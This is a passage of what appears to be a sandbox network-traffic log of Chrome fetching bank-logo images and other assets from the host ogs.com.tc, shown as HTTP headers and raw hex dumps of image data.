    2024-05-25 22:18:09 UTC16384INData Raw: 8d 65 3a d4 b4 37 68 39 09 34 8b bd 73 b1 6a bb b3 0b 8c ad 9e 3c d2 42 f5 67 6b 6e 91 37 9b b5 6d fe f1 ef a5 1f a4 df 90 c7 d1 97 cc 00 a4 83 76 c1 0c 53 14 c5 29 80 9d f0 24 28 88 14 a1 06 30 10 26 4c 13 8c 83 04 08 01 80 24 cb e6 02 58 9d fb 72 3c 4d d9 12 8d d4 53 10 a6 10 95 2c b0 02 03 15 11 23 b6 77 ed c4 93 c0 80 08 10 7e 99 c4 39 80 c9 20 c0 04 b2 88 f8 7b 09 95 2d f1 1a a1 c6 fc 94 47 e4 42 5b 8c c9 b2 a4 ca ce cc b0 b5 39 66 f8 02 cc 31 20 67 1c 63 98 f3 fa 87 e3 f5 0f 00 22 03 f5 66 47 d5 99 1f 56 67 b0 13 8e 00 69 a7 30 01 84 a2 33 0e 20 53 18 b0 33 0e 21 00 22 02 13 e6 04 18 e6 34 14 e6 2c 18 c6 34 14 e6 2c 09 cc 60 80 11 01 fa b3 20 c6 31 a0 b3 0e 58 19 d3 06 39 8f 3f ab 33 da 4e 29 14 09 0b d3 4b b3 2a da 3a 6a 1c fb c5 da c9 2b 3d 90 31
    Data Ascii: e:7h94sj<Bgkn7mvS)$(0&L$Xr<MS,#w~9 {-GB[9f1 gc"fGVgi03 S3!"4,4,` 1X9?3N)K*:j+=1
    2024-05-25 22:18:09 UTC3786INData Raw: 48 ec 12 90 4d 73 8a cb 9f 61 f8 3a 68 d9 ea 80 c1 76 9b 25 bd b6 00 66 e9 19 ce 30 a3 39 f5 bc b3 a8 b0 8d 18 47 b1 b7 b2 98 df 94 b2 40 b4 5d 68 8c 4a e8 a8 08 cd 08 c7 b0 e3 3e 40 a4 95 9c db e0 b4 76 f9 3d 55 1c ce d5 3d 65 ed 14 e3 57 d8 c5 52 0d 5c 19 02 64 80 3b d3 30 dc e1 18 6a d7 8d ce 63 9a e5 b3 f6 17 c9 d7 4a e9 70 07 77 b5 f6 f1 3e c2 42 2b 8f 5e df 56 df 77 c6 11 dc 47 a3 9e 48 0e 53 df d6 8d ad 7b 94 2e b3 47 3d ac 0c 71 f8 f6 a1 95 29 a4 a6 66 0e 03 91 b4 10 a3 fa 8e 48 84 bd b5 d1 50 57 59 99 42 9d 1a f9 21 af a6 88 d4 73 ba ab 5a 45 46 f4 ee 77 5f 6a d9 2e 62 8b 4f 61 83 b8 e4 d8 e2 99 53 a0 00 e5 d2 de 68 23 53 5b cd c3 50 59 42 3a 3a 35 84 5b ed d4 6a d8 6e 8a 66 bc 32 bd 7f 48 8c 7b 1e e6 a8 c2 11 b0 41 13 18 21 08 4c 68 c6 21 8d a8
    Data Ascii: HMsa:hv%f09G@]hJ>@v=U=eWR\d;0jcJpw>B+^VwGHS{.G=q)fHPWYB!sZEFw_j.bOaSh#S[PYB::5[jnf2H{A!Lh!


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    4192.168.2.549713185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:08 UTC599OUTGET /assets/images/banks/alternatif.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:09 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:08 GMT
    Content-Type: image/jpeg
    Content-Length: 46102
    Last-Modified: Thu, 23 May 2024 21:37:08 GMT
    Connection: close
    ETag: "664fb704-b416"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:09 UTC16100INData Raw: ff d8 ff e1 0b f3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 31 39 3a 31 30 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:19:10"
    2024-05-25 22:18:09 UTC16384INData Raw: d2 2b 42 e1 d1 22 73 68 a6 4a d7 1d b0 e3 9e 68 7f 4e 9f 8a b2 30 89 7c 49 98 c6 31 8b 87 22 29 5d bf f5 4a ac c8 cb 52 32 b9 cf 80 98 65 46 7c 7f af 48 13 33 28 2f e8 e4 41 10 05 58 be 8a d9 97 4e dd 97 38 40 2f 5d fc 81 1c 59 39 a9 ff 00 19 bb 92 6e 5c 73 dc a3 ee 4a d2 69 b7 e5 db fd ee f2 31 da bc f7 2c e5 6d 84 ad 9b 89 b3 d8 a4 d4 6b 9d b6 ea 47 d9 ed 60 87 d6 fe 44 b0 ce e7 1a 66 8b 60 8b 77 28 e1 c5 ad 5a 9f 6b af 6c c7 28 5c 56 9d f8 ef 42 c2 68 6d 6d 04 c9 b1 da 44 6e 5d a3 c6 37 b0 ef 2d eb 0a 7c 83 dd fb c7 d4 6f 62 a7 39 0e 38 7b c1 8f 97 04 85 61 26 ef a4 b5 96 5c 7a 98 ea 90 f7 5b 06 eb 19 dd 61 e4 c7 be 83 9a 1f d3 a7 a1 8b 1e ba a4 6d c3 2a 9d b3 35 44 bb 58 b5 9e 39 d7 be 9c 15 df 66 65 26 44 9b 28 ff 00 a7 24 5d 8e 85 5c cb 1d b9 6a 6a
    Data Ascii: +B"shJhN0|I1")]JR2eF|H3(/AXN8@/]Y9n\sJi1,mkG`Df`w(Zkl(\VBhmmDn]7-|ob98{a&\z[am*5DX9fe&D($]\jj
    2024-05-25 22:18:09 UTC13618INData Raw: 31 1f 27 1a 05 4e e0 2f b3 c2 cf d8 8b c9 5f e5 8e 6f fb 35 22 54 11 14 55 22 55 44 44 44 4e aa aa ab ec 88 89 eb 67 e2 7f 87 5b 4b 1c 8f 00 e5 a7 59 64 f9 2b 96 72 f3 5c 81 a2 e6 bb fa d9 87 0e e6 a3 27 79 0c c6 55 4f 15 d7 4b 8a 6c 24 a8 ae 03 ba 05 43 24 3f a1 50 47 f1 1c 35 c3 d9 0b 1d b7 24 f2 25 f4 6c e6 3b 27 4e 2d a4 ab 4b 49 48 4e 38 e3 d2 1e 26 e2 d7 56 57 44 6d c9 53 e7 48 30 8d 0a 23 2e 3e f1 8b 60 45 ea 93 90 3c 88 a6 cc 79 23 e4 8c 88 71 e5 58 d9 68 ea c2 df 8a f8 ee 79 a9 b8 ed 67 1b e4 ee 63 23 13 9c 8a 24 0d 1d c5 a3 0e 4d 90 4d ab 8c b7 0c 0c 99 f4 cc 38 51 a3 c3 89 1c 11 b6 22 c5 65 b8 f1 d8 6d 3e e0 65 86 44 1a 6c 13 af dc 28 89 fb 8e f7 8c 73 d6 83 0b 90 7c a8 ba 4e 20 a8 06 9e ec 9b 1f 0b f4 e9 6b ca 36 cd 00 aa 3a 51 bf 57 00 2a dc
    Data Ascii: 1'N/_o5"TU"UDDDNg[KYd+r\'yUOKl$C$?PG5$%l;'N-KIHN8&VWDmSH0#.>`E<y#qXhygc#$MM8Q"em>eDl(s|N k6:QW*


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    5192.168.2.549716185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:08 UTC596OUTGET /assets/images/banks/anadolu.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:09 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:09 GMT
    Content-Type: image/jpeg
    Content-Length: 20736
    Last-Modified: Thu, 23 May 2024 21:37:09 GMT
    Connection: close
    ETag: "664fb705-5100"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:09 UTC16100INData Raw: ff d8 ff e1 08 61 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 31 37 3a 32 30 3a 30 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: aExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 17:20:05"
    2024-05-25 22:18:09 UTC4636INData Raw: 69 f1 f6 8f 26 d3 0d a9 d8 57 69 aa da ff 00 75 47 4a ac 1d b4 03 11 3e c5 41 cd 1f d9 f6 a2 af f0 fe a6 9f dd 8f 0c ff 00 ba ef bf c5 f1 d3 63 7a 52 48 ba d1 71 5e 6b 67 6d 28 c6 71 cd 32 c8 f9 1a a5 9b 34 e6 72 23 88 69 b2 51 c5 7a af fd 27 af ab 6d 05 ec f8 b5 54 94 55 b3 ae 6e 2d 26 95 a0 85 5b 55 59 14 b3 6c 27 cb 33 fd 9a 18 b0 e2 01 e4 23 97 ec 6b 1a ab ea 26 aa f2 1d 9d b6 03 a9 79 09 63 d4 b4 c0 38 ca f4 a4 f1 cf 91 3d 93 e8 f3 f6 4e 33 4a 90 05 27 01 94 ab cf b5 ee 6a 35 26 ce 1a 7c 51 5e 89 eb 27 e5 9f 34 69 68 45 d9 05 cf fc 86 c2 5f 47 19 99 0e b3 b0 72 9b 1a 8a 5d 54 31 3f d8 6d 24 d8 b6 b9 ca 9b a9 2d 63 95 3d ae 9b ee a9 f2 54 4e 2b e4 36 35 e3 fc b9 d9 39 ae 47 a0 41 8c c2 7d 57 55 97 45 4f 16 6d 95 14 97 fb 22 a4 fc fd a3 cd 06 4b 57 ed
    Data Ascii: i&WiuGJ>AczRHq^kgm(q24r#iQz'mTUn-&[UYl'3#k&yc8=N3J'j5&|Q^'4ihE_Gr]T1?m$-c=TN+659GA}WUEOm"KW


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    6192.168.2.549717185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:08 UTC594OUTGET /assets/images/banks/deniz.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:09 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:09 GMT
    Content-Type: image/jpeg
    Content-Length: 5774
    Last-Modified: Thu, 23 May 2024 21:37:10 GMT
    Connection: close
    ETag: "664fb706-168e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:09 UTC5774INData Raw: 52 49 46 46 86 16 00 00 57 45 42 50 56 50 38 20 7a 16 00 00 f0 68 00 9d 01 2a f4 01 c8 00 3e 49 22 8f 45 a2 a2 21 11 58 7c d4 28 04 84 b2 b7 70 bb 00 88 cb 8f f4 bd 84 57 87 c4 7f 6a fd cb f6 b3 b0 bf 74 fc 69 ec cb fb 77 60 f1 a4 eb 0b f6 3f dd bf 76 bf cc 7b f8 ff 4f fd 83 dc d7 e9 0f 60 2f d4 1f f8 3f e0 ff c7 7e b7 f7 3b fd ae f5 05 fa e7 ff 2b fb f7 bb 0f f8 df d9 9f 73 3f b3 df b3 3f 00 1f cd bf d4 75 89 7e e9 7b 07 fe da 7f ff f5 c8 fd b4 f8 4e fe b9 ff 0f f7 03 da 73 ff 07 b0 06 f9 a7 8f ff b3 7e 3e 78 1f fd 57 f2 7b b1 83 d8 9e d3 f3 0c ea 2f 34 bf 8c 7d 74 fc 2f f5 6f da 8f ca 2e 76 78 02 fe 2b fc b7 fc 4f f5 bf da 7f ec 9f b8 7c 95 9a f7 98 17 b2 bf 4e ff 5d f7 07 e9 8f a9 f7 7b 3d 80 bf 99 7f 5a ff 37 eb 9f fa ff 09 2a 00 7f 2e fe e3 ff 23 ee
    Data Ascii: RIFFWEBPVP8 zh*>I"E!X|(pWjtiw`?v{O`/?~;+s??u~{Ns~>xW{/4}t/o.vx+O|N]{=Z7*.#


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    7192.168.2.549718185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:09 UTC584OUTGET /assets/images/1.png HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:09 UTC281INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:09 GMT
    Content-Type: image/png
    Content-Length: 2220
    Last-Modified: Thu, 23 May 2024 21:37:05 GMT
    Connection: close
    ETag: "664fb701-8ac"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:09 UTC2220INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a5 00 00 00 28 08 03 00 00 01 df dc fa 78 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 80 50 4c 54 45 ff ff ff fe fb fc fc dd de f8 ba bb f4 9e 9f f1 88 89 ef 78 79 ed 6f 6f ec 69 6a ec 64 65 f4 9b 9c fa d1 d1 fe f0 ef f1 85 86 eb 65 66 f3 94 95 f7 b4 b5 f9 c8 c9 fa cf d0 fa d2 d2 fa ca ca f7 b8 b8 f1 8c 8e e7 4d 4c e0 28 22 e8 53 53 ef 7c 7d e9 54 54 f5 a1 a2 fc d7 d7 fe f6 f6 e2 30 2c df 24 1b fe fc fc ff f9 f9 f6 af af e9 56 57 e7 4a 4a f2 90 92 fc dc dc e2 2e 29 f6 ab ac e6 48 48 fd f3 f2 f2 8e 8f e3 35 32 f8 c2 c3 e8 51 52 e4 37 35 f3 9c 9d fb d3 d4 e0
    Data Ascii: PNGIHDR(xgAMAa cHRMz&u0`:pQ<PLTExyooijdeefML("SS|}TT0,$VWJJ.)HH52QR75


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    8192.168.2.549721185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:09 UTC364OUTGET /assets/images/banks/akbank.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC282INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 3052
    Last-Modified: Thu, 23 May 2024 21:37:06 GMT
    Connection: close
    ETag: "664fb702-bec"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC3052INData Raw: 52 49 46 46 e4 0b 00 00 57 45 42 50 56 50 38 20 d8 0b 00 00 90 47 00 9d 01 2a f4 01 c8 00 3e 49 24 8c 46 22 a2 21 21 24 71 f0 50 09 09 65 6e e1 76 b1 1b 10 1f dd ff 20 3b fa 28 07 4a fc 80 fc c6 f9 81 a6 ff 45 fb fb fb c9 fe cb e2 af 6a 7c ab e6 e3 c4 7f dc 3f 30 bf b1 7f ff ff ff f3 4f f9 cf e4 37 c9 7f b7 2f 70 0f d1 cf f1 9f db 7f 6a 7f c1 ff ff ff ff e0 63 cc 07 ed 1f ed 0f bc bf f7 3f f8 1f d5 7d cb 7a 00 7f 3a fe c7 ff c3 b0 3b d0 03 f6 cf ff ff b3 7f fa af fa 5f ef 3f 7f fe 8f 3f ae 7f 96 ff c5 fe d3 da 0b fe 8f 58 07 09 8f f7 2f c6 cf 09 bf c2 63 ba 81 07 dd 1f d0 fe 42 72 03 af ae f4 a5 d2 f8 50 7f 2d e9 26 94 d9 a2 ff de f3 73 f5 70 4b af 2e 08 5e a5 09 28 89 e7 17 97 04 2f 52 84 94 44 f3 8b cb 82 17 a9 42 4a 22 79 c5 e5 c1 0b d4 a1 25 11 3c e2
    Data Ascii: RIFFWEBPVP8 G*>I$F"!!$qPenv ;(JEj|?0O7/pjc?}z:;_??X/cBrP-&spK.^(/RDBJ"y%<


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    9192.168.2.549722185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:09 UTC594OUTGET /assets/images/banks/vakif.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC283INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 4414
    Last-Modified: Thu, 23 May 2024 21:37:20 GMT
    Connection: close
    ETag: "664fb710-113e"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC4414INData Raw: 52 49 46 46 36 11 00 00 57 45 42 50 56 50 38 20 2a 11 00 00 90 5b 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 46 22 a2 21 21 22 32 48 d8 50 09 09 69 6e e1 77 61 1f c8 1a 5c 7d 4b f2 1f f2 03 9e d7 69 3b ef be f8 5d 3a 8c fb ef e4 97 fa ae d0 1e 60 1f a4 1f e6 7a 91 79 80 fe 53 fd 4f fd c7 f7 2f 7c 7f 40 1e 80 1f aa 3d 60 1f a8 1e c1 1f b4 7e 98 1f b7 3f 05 df b3 7f b5 ff 01 7f ca 7f b0 6a ab f9 97 fb 37 64 bf d2 ff a3 fe b8 7f 5c ec 3a ef 37 ad 9c ad e2 83 f1 0f a9 bf 6b fe bf fb 25 fd bf f7 4b e2 8f ea 5f 91 1f 8d de cd f0 02 fc 47 f8 ef f6 0f cb 5f c8 fe 34 c0 01 fa 5f f5 6f f0 ff 99 1f d8 fd 07 3f 6c f4 27 ec a7 fb bf 70 0f e5 1f cd bf cc 7e 67 fa c7 7f 20 f1 6f a0 07 f1 8f ec 1f ea 7e f7 7e 37 3f d1 ff 43 fe 3b f7 33 db bf cf 7f f1 ff c6 7f 99 f9 0c fe 5d fd
    Data Ascii: RIFF6WEBPVP8 *[*>I$F"!!"2HPinwa\}Ki;]:`zySO/|@=`~?j7d\:7k%K_G_4_o?l'p~g o~~7?C;3]


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    10192.168.2.549732185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC609OUTGET /assets/images/edkkds.svg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://ogs.com.tc/assets/css/style.css
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC286INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/svg+xml
    Content-Length: 8746
    Last-Modified: Thu, 23 May 2024 21:37:21 GMT
    Connection: close
    ETag: "664fb711-222a"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC8746INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 37 32 2e 35 20 31 30 30 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 45 36 45 36 45 36 22 20 64 3d 22 4d 38 36 2e 31 20 32 36 2e 34 63 2d 2e 31 2d 31 2d 2e 39 2d 32 2d 32 2d 32 2e 33 6c 2d 33 38 2e 33 2d 31 33 63 2d 2e 36 2d 2e 32 2d 31 2e 34 2d 2e 32 2d 32 2e 31 20 30 6c 2d 33 38 2e 34 20 31 33 63 2d 31 20 2e 33 2d 31 2e 39 20 31 2e 32 2d 32 20 32 2e 33 43 2e 36 20 35 32 2e 35 20 35 20 37 32 2e 33 20 31 36 2e 38 20 38 35 2e 35 20 32 38 2e 39 20 39 38 2e 37 20 34 34 20 39 39 2e 38 20 34 34 2e 37 20 39 39 2e 38 68 2e 34 63 2e 36 20 30 20 31 35 2e 38 2d 31 20 32 37 2e 38 2d 31 34 2e 33 43 38 34 2e
    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 672.5 100"><path fill="#E6E6E6" d="M86.1 26.4c-.1-1-.9-2-2-2.3l-38.3-13c-.6-.2-1.4-.2-2.1 0l-38.4 13c-1 .3-1.9 1.2-2 2.3C.6 52.5 5 72.3 16.8 85.5 28.9 98.7 44 99.8 44.7 99.8h.4c.6 0 15.8-1 27.8-14.3C84.


    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    11192.168.2.549729185.216.70.934436688C:\Program Files\Google\Chrome\Application\chrome.exe
    TimestampBytes transferredDirectionData
    2024-05-25 22:18:10 UTC366OUTGET /assets/images/banks/albaraka.jpg HTTP/1.1
    Host: ogs.com.tc
    Connection: keep-alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: */*
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
    2024-05-25 22:18:10 UTC284INHTTP/1.1 200 OK
    Server: nginx
    Date: Sat, 25 May 2024 22:18:10 GMT
    Content-Type: image/jpeg
    Content-Length: 36270
    Last-Modified: Thu, 23 May 2024 21:37:07 GMT
    Connection: close
    ETag: "664fb703-8dae"
    Alt-Svc: h3=":443"; ma=86400
    X-Powered-By: PleskLin
    Accept-Ranges: bytes
    2024-05-25 22:18:10 UTC16100INData Raw: ff d8 ff e1 0b d3 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 31 30 3a 30 31 20 32 30 3a 31 39 3a 32 37 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00
    Data Ascii: ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:10:01 20:19:27"
    2024-05-25 22:18:10 UTC16384INData Raw: 8d 65 3a d4 b4 37 68 39 09 34 8b bd 73 b1 6a bb b3 0b 8c ad 9e 3c d2 42 f5 67 6b 6e 91 37 9b b5 6d fe f1 ef a5 1f a4 df 90 c7 d1 97 cc 00 a4 83 76 c1 0c 53 14 c5 29 80 9d f0 24 28 88 14 a1 06 30 10 26 4c 13 8c 83 04 08 01 80 24 cb e6 02 58 9d fb 72 3c 4d d9 12 8d d4 53 10 a6 10 95 2c b0 02 03 15 11 23 b6 77 ed c4 93 c0 80 08 10 7e 99 c4 39 80 c9 20 c0 04 b2 88 f8 7b 09 95 2d f1 1a a1 c6 fc 94 47 e4 42 5b 8c c9 b2 a4 ca ce cc b0 b5 39 66 f8 02 cc 31 20 67 1c 63 98 f3 fa 87 e3 f5 0f 00 22 03 f5 66 47 d5 99 1f 56 67 b0 13 8e 00 69 a7 30 01 84 a2 33 0e 20 53 18 b0 33 0e 21 00 22 02 13 e6 04 18 e6 34 14 e6 2c 18 c6 34 14 e6 2c 09 cc 60 80 11 01 fa b3 20 c6 31 a0 b3 0e 58 19 d3 